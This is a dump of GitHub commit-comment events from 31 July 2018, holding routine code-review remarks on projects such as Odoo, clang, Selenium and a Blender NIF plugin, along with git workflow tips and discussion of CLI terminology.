{"id":"8044956637","type":"CommitCommentEvent","actor":{"login":"sbidoul"},"repo":{"name":"acsone/odoo"},"payload":{"comment":{"id":29906522,"position":32,"line":312,"path":"addons/stock/models/procurement.py","commit_id":"e2b18cd474f55bc9d0e4804b4f3104bdaeb85fa2","created_at":"2018-07-31T15:41:46Z","updated_at":"2018-07-31T15:41:46Z","author_association":"MEMBER","body":"this if is not needed"}},"created_at":"2018-07-31T15:41:46Z"}
{"id":"8044957763","type":"CommitCommentEvent","actor":{"login":"Robinlovelace"},"repo":{"name":"Robinlovelace/geocompr"},"payload":{"comment":{"id":29906529,"position":null,"line":null,"path":null,"commit_id":"b386827dedb3c36ca28d16849c24fafd445a1800","created_at":"2018-07-31T15:41:56Z","updated_at":"2018-07-31T15:41:56Z","author_association":"OWNER","body":"I'm not sure this is an improvement. The term CLI has been removed and replace with 'console' or 'programming interface'. What is wrong with CLI? The way we use it is compatible with other places I've seen it and the word GUI, e.g.:\r\n\r\n- https://www.cybrary.it/0p3n/command-line-interface-cli-vs-graphical-user-interface-gui/\r\n- https://www.computerhope.com/issues/ch000619.htm\r\n- https://www.difference.wiki/gui-vs-command-line/\r\n\r\nMaybe I need to engage with the review comment that is behind this. I don't think the result is clearer. I think it adds ambiguity. One solution: briefly define CLI at the outset to avoid any confusion.\r\n"}},"created_at":"2018-07-31T15:41:56Z"}
{"id":"8044962964","type":"CommitCommentEvent","actor":{"login":"skjnldsv"},"repo":{"name":"team-popcorn/contacts"},"payload":{"comment":{"id":29906537,"position":117,"line":117,"path":"css/settings.scss","commit_id":"97b235b5fb732f7ba222260e231460db7d1a121a","created_at":"2018-07-31T15:42:48Z","updated_at":"2018-07-31T15:42:48Z","author_association":"COLLABORATOR","body":"@suntala @sleepypioneer \r\nfor the background of the icons: please use thenew svg api (not documented yet, sorry :see_no_evil: )\r\n\r\n`@include icon-color('contacts', 'group', $color-black);`\r\n\r\nExample: https://github.com/nextcloud/server/pull/9984/files#diff-73946bf60d9717368158f91af1bd7c09R87"}},"created_at":"2018-07-31T15:42:48Z"}
{"id":"8044962986","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29906538,"position":null,"line":null,"path":null,"commit_id":"ef893601658eda848924c18abeea207ef2d1aa6a","created_at":"2018-07-31T15:42:48Z","updated_at":"2018-07-31T15:42:48Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [clarifywoo](https://clarifywoo-static-docs.pantheonsite.io/docs) Multidev environment:\n- [/docs/guides/woocommerce/configure](https://clarifywoo-static-docs.pantheonsite.io/docs/guides/woocommerce/configure)\n- [/docs/wordpress-sessions](https://clarifywoo-static-docs.pantheonsite.io/docs/wordpress-sessions)\n"}},"created_at":"2018-07-31T15:42:48Z"}
{"id":"8044965865","type":"CommitCommentEvent","actor":{"login":"twalpole"},"repo":{"name":"SeleniumHQ/selenium"},"payload":{"comment":{"id":29906544,"position":6,"line":366,"path":"rb/lib/selenium/webdriver/remote/oss/bridge.rb","commit_id":"a3d2f41cd392c9842e3b37be673ec0e287c58ce8","created_at":"2018-07-31T15:43:16Z","updated_at":"2018-07-31T15:43:16Z","author_association":"CONTRIBUTOR","body":"@p0deje Looks good -- all expected tests now pass - thanks"}},"created_at":"2018-07-31T15:43:16Z"}
{"id":"8044966093","type":"CommitCommentEvent","actor":{"login":"skjnldsv"},"repo":{"name":"team-popcorn/contacts"},"payload":{"comment":{"id":29906547,"position":138,"line":138,"path":"css/settings.scss","commit_id":"97b235b5fb732f7ba222260e231460db7d1a121a","created_at":"2018-07-31T15:43:18Z","updated_at":"2018-07-31T15:43:18Z","author_association":"COLLABORATOR","body":"Same here for the svg icon api @suntala @sleepypioneer "}},"created_at":"2018-07-31T15:43:18Z"}
{"id":"8044966298","type":"CommitCommentEvent","actor":{"login":"bennybp"},"repo":{"name":"dnoci001/CMS-Python-DevOps"},"payload":{"comment":{"id":29906548,"position":null,"line":null,"path":null,"commit_id":"3159653390b54d9c65d1455954dc4b68d2be45be","created_at":"2018-07-31T15:43:21Z","updated_at":"2018-07-31T15:43:21Z","author_association":"NONE","body":"Good idea, however can you typeset the command as inline code? Also, maybe mention that other users may use different linux distributions and the command may be different?"}},"created_at":"2018-07-31T15:43:21Z"}
{"id":"8044966683","type":"CommitCommentEvent","actor":{"login":"rousseldenis"},"repo":{"name":"acsone/odoo"},"payload":{"comment":{"id":29906550,"position":32,"line":312,"path":"addons/stock/models/procurement.py","commit_id":"e2b18cd474f55bc9d0e4804b4f3104bdaeb85fa2","created_at":"2018-07-31T15:43:25Z","updated_at":"2018-07-31T15:43:25Z","author_association":"MEMBER","body":"indeed\r\n"}},"created_at":"2018-07-31T15:43:25Z"}
{"id":"8044967760","type":"CommitCommentEvent","actor":{"login":"Xazax-hun"},"repo":{"name":"mgehre/clang"},"payload":{"comment":{"id":29906553,"position":1516,"line":1516,"path":"lib/Analysis/Lifetime.cpp","commit_id":"5298257add037290f108946e024685e5e723de3f","created_at":"2018-07-31T15:43:35Z","updated_at":"2018-07-31T15:43:35Z","author_association":"NONE","body":"I am a bit worried about this fixed point iteration.\r\nI would live to see the following things:\r\nSTATISTIC for the number of maximum iterations, see https://github.com/llvm-mirror/clang/blob/master/lib/StaticAnalyzer/Core/CoreEngine.cpp for examples.\r\n\r\nThis would be helpful to research how bad the number of iterations are for large real world projects. Also it can help debug divergence.\r\n\r\nA limit on the number of iterations."}},"created_at":"2018-07-31T15:43:35Z"}
{"id":"8044969872","type":"CommitCommentEvent","actor":{"login":"gallexi"},"repo":{"name":"gallexi/test"},"payload":{"comment":{"id":29906560,"position":null,"line":null,"path":null,"commit_id":"e4353111d676abb7d38a4d7dbc07ead813acb8ea","created_at":"2018-07-31T15:43:55Z","updated_at":"2018-07-31T15:43:55Z","author_association":"OWNER","body":"![test gif](https://media.giphy.com/media/gw3IWyGkC0rsazTi/giphy.gif)"}},"created_at":"2018-07-31T15:43:55Z"}
{"id":"8044969962","type":"CommitCommentEvent","actor":{"login":"rousseldenis"},"repo":{"name":"acsone/odoo"},"payload":{"comment":{"id":29906561,"position":30,"line":310,"path":"addons/stock/models/procurement.py","commit_id":"e2b18cd474f55bc9d0e4804b4f3104bdaeb85fa2","created_at":"2018-07-31T15:43:55Z","updated_at":"2018-07-31T15:43:55Z","author_association":"MEMBER","body":"nope, we are not on the same procurements (out <> in)"}},"created_at":"2018-07-31T15:43:55Z"}
{"id":"8044970364","type":"CommitCommentEvent","actor":{"login":"Vegter"},"repo":{"name":"Amsterdam/GOB-Import-Client-Template"},"payload":{"comment":{"id":29906563,"position":5,"line":7,"path":"src/gobimportclient/import_client.py","commit_id":"0672b5b5a2ae52edabea7808e0c7b287d40f5199","created_at":"2018-07-31T15:44:00Z","updated_at":"2018-07-31T15:44:00Z","author_association":"COLLABORATOR","body":"The generic apporach was to import each set without knowledge about it. Every set that implements the generic interface can be imported"}},"created_at":"2018-07-31T15:44:00Z"}
{"id":"8044973978","type":"CommitCommentEvent","actor":{"login":"Huevos"},"repo":{"name":"OpenViX/enigma2"},"payload":{"comment":{"id":29906572,"position":null,"line":null,"path":null,"commit_id":"ed689159e75bed8a8df56668bb3ca67d844468f6","created_at":"2018-07-31T15:44:34Z","updated_at":"2018-07-31T15:44:34Z","author_association":"CONTRIBUTOR","body":"Rob, it is just a tool located in the git for people that want to use it. It never ends up in the build or on an STB."}},"created_at":"2018-07-31T15:44:34Z"}
{"id":"8044977474","type":"CommitCommentEvent","actor":{"login":"Xazax-hun"},"repo":{"name":"mgehre/clang"},"payload":{"comment":{"id":29906581,"position":1519,"line":1519,"path":"lib/Analysis/Lifetime.cpp","commit_id":"5298257add037290f108946e024685e5e723de3f","created_at":"2018-07-31T15:45:08Z","updated_at":"2018-07-31T15:45:08Z","author_association":"NONE","body":"Why do you need one more pass over the CFG?\r\n\r\nI would expect the analysis to be monotonic, i.e.: if you see an invalid pointer is being used, the next pass should not make that pointer valid again. So as soon as you see the use of an invalid pointer, I think it should be safe to warn right away."}},"created_at":"2018-07-31T15:45:08Z"}
{"id":"8044979027","type":"CommitCommentEvent","actor":{"login":"Nisnow"},"repo":{"name":"HHSProgrammingClub/smash-my-buttons"},"payload":{"comment":{"id":29906590,"position":null,"line":null,"path":null,"commit_id":"d44964f4593d0d811c513bf42d9a81c2d146aecd","created_at":"2018-07-31T15:45:20Z","updated_at":"2018-07-31T15:45:20Z","author_association":"CONTRIBUTOR","body":"You have to click outside the program first then click back in. Idk why it's happening"}},"created_at":"2018-07-31T15:45:20Z"}
{"id":"8044979531","type":"CommitCommentEvent","actor":{"login":"mjarkk"},"repo":{"name":"dennis1248/Automated-Windows-10-configuration"},"payload":{"comment":{"id":29906595,"position":null,"line":null,"path":null,"commit_id":"c65558102e5ee5a12500474d3079a3d5ca693668","created_at":"2018-07-31T15:45:25Z","updated_at":"2018-07-31T15:45:25Z","author_association":"COLLABORATOR","body":"thx :D"}},"created_at":"2018-07-31T15:45:25Z"}
{"id":"8044979818","type":"CommitCommentEvent","actor":{"login":"p3p"},"repo":{"name":"p3p/Marlin"},"payload":{"comment":{"id":29906596,"position":null,"line":null,"path":null,"commit_id":"b5447f5b71a890144228cb34b9422b19e66d7cde","created_at":"2018-07-31T15:45:28Z","updated_at":"2018-07-31T15:45:28Z","author_association":"OWNER","body":"pinmapping is part of the framework now not Marlin and shouldn't be affected by the configs, what would need added?"}},"created_at":"2018-07-31T15:45:28Z"}
{"id":"8044975953","type":"CommitCommentEvent","actor":{"login":"cybertron"},"repo":{"name":"cybertron/openstack-virtual-baremetal"},"payload":{"comment":{"id":29906575,"position":null,"line":null,"path":null,"commit_id":"80e04ee69d2554c98e7c0cef09004bc8bf73afc1","created_at":"2018-07-31T15:44:52Z","updated_at":"2018-07-31T15:44:52Z","author_association":"OWNER","body":"Okay, I was naughty and rewrote history on this branch to add undercloud-networks.yaml to the commit.  Unfortunately that does mean this discussion is now detached from the branch. :-/"}},"created_at":"2018-07-31T15:44:52Z"}
{"id":"8044988003","type":"CommitCommentEvent","actor":{"login":"Allofich"},"repo":{"name":"Interkarma/daggerfall-unity"},"payload":{"comment":{"id":29906616,"position":14,"line":312,"path":"Assets/Scripts/Game/PlayerEnterExit.cs","commit_id":"b02c1dee1c2f22e245aa98782d5792eebd501ad2","created_at":"2018-07-31T15:46:46Z","updated_at":"2018-07-31T15:46:46Z","author_association":"CONTRIBUTOR","body":"You can also just look at the floor and use the \"teleport\" console command a few times (with the game still paused at the console) and you can usually teleport down through the floor/into the \"void\" outside the dungeon walls and you can navigate over to any water quite easily at that point by just pointing and using teleport. I know Castle Daggerfall and Castle Wayrest both have water."}},"created_at":"2018-07-31T15:46:46Z"}
{"id":"8044988107","type":"CommitCommentEvent","actor":{"login":"neomonkeus"},"repo":{"name":"niftools/blender_nif_plugin"},"payload":{"comment":{"id":29906617,"position":null,"line":null,"path":null,"commit_id":"085053dfae9236edd9eaecb85473aa36c0452731","created_at":"2018-07-31T15:46:47Z","updated_at":"2018-07-31T15:46:47Z","author_association":"MEMBER","body":"You should use git pull --rebase to avoid creating merge commits like this."}},"created_at":"2018-07-31T15:46:47Z"}
{"id":"8044990034","type":"CommitCommentEvent","actor":{"login":"KentJames"},"repo":{"name":"nithyanandan/EPIC"},"payload":{"comment":{"id":29906624,"position":null,"line":null,"path":null,"commit_id":"98d284ab65b9c9b11513ab11ccf2a3a6079d91d0","created_at":"2018-07-31T15:47:07Z","updated_at":"2018-07-31T15:47:07Z","author_association":"COLLABORATOR","body":"The multiply needs to be done post-FFT because of multiplication-convolution theorem. So if you pushed the FFT to the side you are now convolving the grids with each other, which is probably worse for getting speedup out of the GPU.\n\nSomethings gonna have to budge in terms of reducing the F-Domain output. I’m not sure if there is a mathematical way we can code our way out of this bag. TIme-averaging the F-Domain output? I’m not so sure if that works.\n\n> On 31 Jul 2018, at 08:29, jaycedowell <notifications@github.com> wrote:\n> \n> My guess is going to be that the array is (1000, 1, 2, 256, 256) with dimensions of time, channels, polarizations, image x, image y.\n> \n> Can we push the FFT to the other side of the accumulation? So instead of\n> \n> grid->FFT->multiply->accumulate\n> \n> switch over to\n> \n> grid->multiple->accumulate->FFT\n> \n> ?\n> \n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub <https://github.com/nithyanandan/EPIC/commit/98d284ab65b9c9b11513ab11ccf2a3a6079d91d0#commitcomment-29906286>, or mute the thread <https://github.com/notifications/unsubscribe-auth/AB73hHOkjL6UzLrBxXVT_DoSj2A7swmBks5uMHftgaJpZM4Vnh9J>.\n> \n\n"}},"created_at":"2018-07-31T15:47:07Z"}
{"id":"8044992812","type":"CommitCommentEvent","actor":{"login":"kranar"},"repo":{"name":"eidolonsystems/nexus"},"payload":{"comment":{"id":29906628,"position":28,"line":118,"path":"Applications/spire/source/book_view/book_view_window.cpp","commit_id":"dfd9eb88f06c0d4f6928dee101288ce59de1fd51","created_at":"2018-07-31T15:47:34Z","updated_at":"2018-07-31T15:47:34Z","author_association":"COLLABORATOR","body":"We avoid implicit conversions to bool, so explicitly compare this to nullptr, ie if(x == nullptr) rather than if(x)"}},"created_at":"2018-07-31T15:47:34Z"}
{"id":"8044994522","type":"CommitCommentEvent","actor":{"login":"neomonkeus"},"repo":{"name":"TagnumElite/blender_nif_plugin"},"payload":{"comment":{"id":29906632,"position":null,"line":null,"path":null,"commit_id":"085053dfae9236edd9eaecb85473aa36c0452731","created_at":"2018-07-31T15:47:50Z","updated_at":"2018-07-31T15:47:50Z","author_association":"NONE","body":"You did a pull instead of a git pull --rebase"}},"created_at":"2018-07-31T15:47:50Z"}
{"id":"8044994728","type":"CommitCommentEvent","actor":{"login":"lgkern"},"repo":{"name":"simulationcraft/simc"},"payload":{"comment":{"id":29906633,"position":null,"line":null,"path":null,"commit_id":"95530cc5ac5f158fefabab4b4ffd8b1b324e38c4","created_at":"2018-07-31T15:47:52Z","updated_at":"2018-07-31T15:47:52Z","author_association":"CONTRIBUTOR","body":"forgot to add the .hpp to the commit :D \r\nIt was fixed on https://github.com/simulationcraft/simc/commit/b02eb010acf4cbe60d78d154ef53cb1dc3c1b221"}},"created_at":"2018-07-31T15:47:52Z"}
{"id":"8045001225","type":"CommitCommentEvent","actor":{"login":"georgemac510"},"repo":{"name":"georgemac510/CodeAcademy-work"},"payload":{"comment":{"id":29906642,"position":null,"line":null,"path":null,"commit_id":"ab94bcba0f9580b7a34af8ca87766d47d410ae58","created_at":"2018-07-31T15:48:53Z","updated_at":"2018-07-31T15:48:53Z","author_association":"OWNER","body":"This is my first adventure into the world of coding.  Wish me luck!"}},"created_at":"2018-07-31T15:48:53Z"}
{"id":"8045005982","type":"CommitCommentEvent","actor":{"login":"Military-Doctor"},"repo":{"name":"Military-Doctor/QieGaoWorld"},"payload":{"comment":{"id":29906649,"position":4,"line":47,"path":"QieGaoWorld/views/declare.py","commit_id":"cc6af05aaa321eba9bb718e9f3d8429a2d245555","created_at":"2018-07-31T15:49:39Z","updated_at":"2018-07-31T15:49:39Z","author_association":"OWNER","body":"怎么会犯这么低级的错误"}},"created_at":"2018-07-31T15:49:39Z"}
{"id":"8045006458","type":"CommitCommentEvent","actor":{"login":"neomonkeus"},"repo":{"name":"TagnumElite/blender_nif_plugin"},"payload":{"comment":{"id":29906652,"position":40,"line":216,"path":"io_scene_nif/materialsys/material_import.py","commit_id":"21c9376ea41c963bd5d6661023ac8fe1a03fb452","created_at":"2018-07-31T15:49:45Z","updated_at":"2018-07-31T15:49:45Z","author_association":"NONE","body":"Side note : Controller properties should go into the animation module."}},"created_at":"2018-07-31T15:49:45Z"}
{"id":"8045008017","type":"CommitCommentEvent","actor":{"login":"Military-Doctor"},"repo":{"name":"Military-Doctor/QieGaoWorld"},"payload":{"comment":{"id":29906655,"position":4,"line":47,"path":"QieGaoWorld/views/declare.py","commit_id":"cc6af05aaa321eba9bb718e9f3d8429a2d245555","created_at":"2018-07-31T15:50:00Z","updated_at":"2018-07-31T15:50:00Z","author_association":"OWNER","body":"~可能年纪大了，，~"}},"created_at":"2018-07-31T15:50:00Z"}
{"id":"8045008649","type":"CommitCommentEvent","actor":{"login":"gallexi"},"repo":{"name":"gallexi/test"},"payload":{"comment":{"id":29906659,"position":null,"line":null,"path":null,"commit_id":"e4353111d676abb7d38a4d7dbc07ead813acb8ea","created_at":"2018-07-31T15:50:07Z","updated_at":"2018-07-31T15:50:07Z","author_association":"OWNER","body":"body1"}},"created_at":"2018-07-31T15:50:07Z"}
{"id":"8045013364","type":"CommitCommentEvent","actor":{"login":"dschwabeS11"},"repo":{"name":"Perlkonig/grav-theme-knowledge-base"},"payload":{"comment":{"id":29906669,"position":null,"line":null,"path":null,"commit_id":"2c3cfc457ffcb077c7cf6ae5b7cef9fe24fbe534","created_at":"2018-07-31T15:50:52Z","updated_at":"2018-07-31T15:50:52Z","author_association":"NONE","body":"I don't know if that is possible. But since the theme wants to install several plugins during deployment it might be. :)"}},"created_at":"2018-07-31T15:50:52Z"}
{"id":"8045013514","type":"CommitCommentEvent","actor":{"login":"ChavanShweta"},"repo":{"name":"PEDSnet/pedsnetdcc"},"payload":{"comment":{"id":29906670,"position":null,"line":null,"path":null,"commit_id":"5009e6488e2a25b2862723a0248691d1b22e2203","created_at":"2018-07-31T15:50:54Z","updated_at":"2018-07-31T15:50:54Z","author_association":"CONTRIBUTOR","body":"fixes #113 "}},"created_at":"2018-07-31T15:50:54Z"}
{"id":"8045015118","type":"CommitCommentEvent","actor":{"login":"gavinb11"},"repo":{"name":"gavinb11/COSMOS-Config-Files"},"payload":{"comment":{"id":29906677,"position":null,"line":null,"path":null,"commit_id":"fd204807265ca5323d5dcaa5198e3eb0fdce19ec","created_at":"2018-07-31T15:51:10Z","updated_at":"2018-07-31T15:51:10Z","author_association":"OWNER","body":"real - 7-23-18 - cmd_tlm"}},"created_at":"2018-07-31T15:51:10Z"}
{"id":"8045016016","type":"CommitCommentEvent","actor":{"login":"TagnumElite"},"repo":{"name":"TagnumElite/blender_nif_plugin"},"payload":{"comment":{"id":29906678,"position":null,"line":null,"path":null,"commit_id":"085053dfae9236edd9eaecb85473aa36c0452731","created_at":"2018-07-31T15:51:18Z","updated_at":"2018-07-31T15:51:18Z","author_association":"OWNER","body":"I used `git pull --rebase niftools develop` but this happened when pushing with GitHub Desktop."}},"created_at":"2018-07-31T15:51:18Z"}
{"id":"8045016120","type":"CommitCommentEvent","actor":{"login":"gallexi"},"repo":{"name":"gallexi/test"},"payload":{"comment":{"id":29906679,"position":1,"line":1,"path":"README.md","commit_id":"e4353111d676abb7d38a4d7dbc07ead813acb8ea","created_at":"2018-07-31T15:51:19Z","updated_at":"2018-07-31T15:51:19Z","author_association":"OWNER","body":"test1"}},"created_at":"2018-07-31T15:51:19Z"}
{"id":"8045017984","type":"CommitCommentEvent","actor":{"login":"Robinlovelace"},"repo":{"name":"Robinlovelace/geocompr"},"payload":{"comment":{"id":29906684,"position":null,"line":null,"path":null,"commit_id":"b386827dedb3c36ca28d16849c24fafd445a1800","created_at":"2018-07-31T15:51:36Z","updated_at":"2018-07-31T15:51:36Z","author_association":"OWNER","body":"Looking further into it, seems plenty of people use the term CLI. An [academic paper](http://www.ijier.net/ijier/article/view/451) on the subject, for example, says:\r\n\r\n>  The R user interface is an interpreted programming environment with a command\r\nline interface (CLI)\r\n\r\nI think that's fairly non-controversial and similar to the way we're using it. Reading up on CLIs vs GUIs now, an interesting debate indeed, and trying to think of the clearest way of explaining what we mean by interacting with a computer using a mouse or a keyboard. I think GUI vs CLI captures it well, but perhaps there are better alternatives."}},"created_at":"2018-07-31T15:51:36Z"}
{"id":"8045022126","type":"CommitCommentEvent","actor":{"login":"grshane"},"repo":{"name":"wvu-online/wvuonline"},"payload":{"comment":{"id":29906696,"position":null,"line":null,"path":null,"commit_id":"5cab1c534deeeb7596d88bd3614d94e8532a04ce","created_at":"2018-07-31T15:52:16Z","updated_at":"2018-07-31T15:52:16Z","author_association":"COLLABORATOR","body":"Created multidev environment [wvuonline#ci-467](https://dashboard.pantheon.io/sites/8fb52aa5-5525-4d73-9b84-f2d86faf1da2#ci-467).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-467-wvuonline.pantheonsite.io/)"}},"created_at":"2018-07-31T15:52:16Z"}
{"id":"8045022842","type":"CommitCommentEvent","actor":{"login":"egenender"},"repo":{"name":"algoritmos-rw/algo2"},"payload":{"comment":{"id":29906697,"position":4,"line":23,"path":"static/06_faq.md","commit_id":"b7de6dafa8af6dde04d10fc623b5c6e7df89b28e","created_at":"2018-07-31T15:52:23Z","updated_at":"2018-07-31T15:52:23Z","author_association":"CONTRIBUTOR","body":"es normal que diga Colla con dos eles?"}},"created_at":"2018-07-31T15:52:23Z"}
{"id":"8045023637","type":"CommitCommentEvent","actor":{"login":"spireken"},"repo":{"name":"eidolonsystems/nexus"},"payload":{"comment":{"id":29906700,"position":28,"line":118,"path":"Applications/spire/source/book_view/book_view_window.cpp","commit_id":"dfd9eb88f06c0d4f6928dee101288ce59de1fd51","created_at":"2018-07-31T15:52:31Z","updated_at":"2018-07-31T15:52:31Z","author_association":"COLLABORATOR","body":"Why?\r\n\r\nAnd where do I push this change to?"}},"created_at":"2018-07-31T15:52:31Z"}
{"id":"8045027235","type":"CommitCommentEvent","actor":{"login":"asmecher"},"repo":{"name":"NateWr/pkp-docs"},"payload":{"comment":{"id":29906709,"position":118,"line":118,"path":"schema/index.md","commit_id":"41ca6165e9c40a3c0b0e283d22a4e02349279f2b","created_at":"2018-07-31T15:53:07Z","updated_at":"2018-07-31T15:53:07Z","author_association":"NONE","body":"PHP7 may not be a problem. We'll be dropping PHP5.6 support when it's no longer maintained by PHP on December 31st: http://php.net/supported-versions.php\r\n\r\n(At that point PHP7.1 will become our minimum.)"}},"created_at":"2018-07-31T15:53:07Z"}
{"id":"8045028193","type":"CommitCommentEvent","actor":{"login":"neomonkeus"},"repo":{"name":"TagnumElite/blender_nif_plugin"},"payload":{"comment":{"id":29906710,"position":34,"line":216,"path":"io_scene_nif/texturesys/texture_export.py","commit_id":"21c9376ea41c963bd5d6661023ac8fe1a03fb452","created_at":"2018-07-31T15:53:15Z","updated_at":"2018-07-31T15:53:15Z","author_association":"NONE","body":"Side Note : Want to get away from this object variable style markers, it should have a query funtion for this textureslot what it is and export it as such."}},"created_at":"2018-07-31T15:53:15Z"}
{"id":"8045030343","type":"CommitCommentEvent","actor":{"login":"treyt22"},"repo":{"name":"StartApp-SDK/StartApp_InApp_SDK_Example"},"payload":{"comment":{"id":29906715,"position":3,"line":4,"path":"build.gradle","commit_id":"e7052cb329082d137446fb6844cc343fa8c10a03","created_at":"2018-07-31T15:53:36Z","updated_at":"2018-07-31T15:53:36Z","author_association":"NONE","body":"}\r\n \r\ndependencies {\r\n    compile 'com.startapp:inapp-sdk:3.9.3'\r\n}"}},"created_at":"2018-07-31T15:53:36Z"}
{"id":"8045032380","type":"CommitCommentEvent","actor":{"login":"32SH"},"repo":{"name":"32SH/portfolio"},"payload":{"comment":{"id":29906721,"position":null,"line":null,"path":null,"commit_id":"56a8244ed35e1f21cecd1bb4c386a5e6b062e23e","created_at":"2018-07-31T15:53:56Z","updated_at":"2018-07-31T15:53:56Z","author_association":"OWNER","body":"# Website\r\nThe website for ShathaPr, i.e. http://ShathaPr.sa.\r\n"}},"created_at":"2018-07-31T15:53:56Z"}
{"id":"8045033695","type":"CommitCommentEvent","actor":{"login":"Huevos"},"repo":{"name":"OpenPLi/enigma2"},"payload":{"comment":{"id":29906728,"position":null,"line":null,"path":null,"commit_id":"c4e987169c49176b6e9127609e004e57f3a6bcc4","created_at":"2018-07-31T15:54:09Z","updated_at":"2018-07-31T15:54:09Z","author_association":"CONTRIBUTOR","body":"Is \"0\" not a valid value for input stream?"}},"created_at":"2018-07-31T15:54:09Z"}
{"id":"8045034428","type":"CommitCommentEvent","actor":{"login":"attuska"},"repo":{"name":"attuska/jwm-settings-manager"},"payload":{"comment":{"id":29906731,"position":null,"line":null,"path":null,"commit_id":"3179861f0af2b1be6138d28caa20e603fc439041","created_at":"2018-07-31T15:54:15Z","updated_at":"2018-07-31T15:54:15Z","author_association":"OWNER","body":"A kész témában mégsem mutatkozik, valószínűleg felülírja valami más."}},"created_at":"2018-07-31T15:54:15Z"}
{"id":"8045038251","type":"CommitCommentEvent","actor":{"login":"jin"},"repo":{"name":"bazelbuild/bazel"},"payload":{"comment":{"id":29906737,"position":null,"line":null,"path":null,"commit_id":"76b7960843b71619c59565cfe7dc642cef7db4c3","created_at":"2018-07-31T15:54:50Z","updated_at":"2018-07-31T15:54:50Z","author_association":"MEMBER","body":"@iirina there’s a typo in @mhlopko’s username - didn’t catch that :("}},"created_at":"2018-07-31T15:54:50Z"}
{"id":"8045038968","type":"CommitCommentEvent","actor":{"login":"asmecher"},"repo":{"name":"NateWr/pkp-docs"},"payload":{"comment":{"id":29906740,"position":118,"line":118,"path":"schema/index.md","commit_id":"41ca6165e9c40a3c0b0e283d22a4e02349279f2b","created_at":"2018-07-31T15:54:57Z","updated_at":"2018-07-31T15:54:57Z","author_association":"NONE","body":"For the record, our validation toolset is one of the things that would probably be better replaced with a standard mechanism, either something like filter_input (or filter_var), or better yet a 3rd-party framework."}},"created_at":"2018-07-31T15:54:57Z"}
{"id":"8045039477","type":"CommitCommentEvent","actor":{"login":"jin"},"repo":{"name":"bazelbuild/bazel"},"payload":{"comment":{"id":29906744,"position":null,"line":null,"path":null,"commit_id":"76b7960843b71619c59565cfe7dc642cef7db4c3","created_at":"2018-07-31T15:55:03Z","updated_at":"2018-07-31T15:55:03Z","author_association":"MEMBER","body":"(On my phone now)"}},"created_at":"2018-07-31T15:55:03Z"}
{"id":"8045040884","type":"CommitCommentEvent","actor":{"login":"ATechnoHazard"},"repo":{"name":"characteress/overpowered"},"payload":{"comment":{"id":29906751,"position":11,"line":381,"path":"drivers/regulator/cpr3-hmss-regulator.c","commit_id":"2346259f0a587427422e4ce5f9d6f23dc4341c94","created_at":"2018-07-31T15:55:17Z","updated_at":"2018-07-31T15:55:17Z","author_association":"NONE","body":"At least your commit names are creative :)"}},"created_at":"2018-07-31T15:55:17Z"}
{"id":"8045043032","type":"CommitCommentEvent","actor":{"login":"ATechnoHazard"},"repo":{"name":"characteress/overpowered"},"payload":{"comment":{"id":29906758,"position":null,"line":null,"path":null,"commit_id":"2346259f0a587427422e4ce5f9d6f23dc4341c94","created_at":"2018-07-31T15:55:38Z","updated_at":"2018-07-31T15:55:38Z","author_association":"NONE","body":"At least your commit names are creative :)"}},"created_at":"2018-07-31T15:55:38Z"}
{"id":"8045045086","type":"CommitCommentEvent","actor":{"login":"twalpole"},"repo":{"name":"SeleniumHQ/selenium"},"payload":{"comment":{"id":29906763,"position":6,"line":366,"path":"rb/lib/selenium/webdriver/remote/oss/bridge.rb","commit_id":"a3d2f41cd392c9842e3b37be673ec0e287c58ce8","created_at":"2018-07-31T15:55:57Z","updated_at":"2018-07-31T15:55:57Z","author_association":"CONTRIBUTOR","body":"Actually there is one unexpected failing test case - \r\nhttps://travis-ci.org/teamcapybara/capybara/jobs/410366968 - where the entire (non-split) filename is reported as not existing -  but I think it's a marionette/firefox issue"}},"created_at":"2018-07-31T15:55:57Z"}
{"id":"8045047952","type":"CommitCommentEvent","actor":{"login":"fgrsnau"},"repo":{"name":"pawelswoboda/LP_MP"},"payload":{"comment":{"id":29906768,"position":131,"line":3518,"path":"include/factors_messages.hxx","commit_id":"023148ae96458bcc438a31c79d29c72e83759737","created_at":"2018-07-31T15:56:24Z","updated_at":"2018-07-31T15:56:24Z","author_association":"CONTRIBUTOR","body":"This is not correct. Previously `load_external_variables` got called and now we call `convert_to_external_variable` inside `export_variables`. This breaks ILP functionality completely."}},"created_at":"2018-07-31T15:56:24Z"}
{"id":"8045053284","type":"CommitCommentEvent","actor":{"login":"32SH"},"repo":{"name":"32SH/portfolio"},"payload":{"comment":{"id":29906775,"position":null,"line":null,"path":null,"commit_id":"56a8244ed35e1f21cecd1bb4c386a5e6b062e23e","created_at":"2018-07-31T15:57:13Z","updated_at":"2018-07-31T15:57:13Z","author_association":"OWNER","body":"ShathaPr.sa.sa"}},"created_at":"2018-07-31T15:57:13Z"}
{"id":"8045056542","type":"CommitCommentEvent","actor":{"login":"jiminssyspire"},"repo":{"name":"eidolonsystems/nexus"},"payload":{"comment":{"id":29906779,"position":28,"line":118,"path":"Applications/spire/source/book_view/book_view_window.cpp","commit_id":"dfd9eb88f06c0d4f6928dee101288ce59de1fd51","created_at":"2018-07-31T15:57:45Z","updated_at":"2018-07-31T15:57:45Z","author_association":"CONTRIBUTOR","body":"You merge spire2018 into fb1167, and continue working on fb1167.\n\nWe avoid implicit conversions to bool because the rules in C++ about such\nconversions are inconsistent and overall it's a broken feature of the\nlanguage. There have been some efforts to improve it by adding an explicit\nbool operator, but no one uses that feature properly.\n\nOn Tue, Jul 31, 2018 at 11:52 AM, spireken <notifications@github.com> wrote:\n\n> Why?\n>\n> And where do I push this change to?\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/eidolonsystems/nexus/commit/dfd9eb88f06c0d4f6928dee101288ce59de1fd51#commitcomment-29906700>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ATg4UYpGBY5OwyOeqn4bT46okRotLvcIks5uMH1SgaJpZM4Vohib>\n> .\n>\n\n\n\n-- \nKamal Mansouri\nSpire Trading Inc.\n+1 647-648-0498\n"}},"created_at":"2018-07-31T15:57:45Z"}
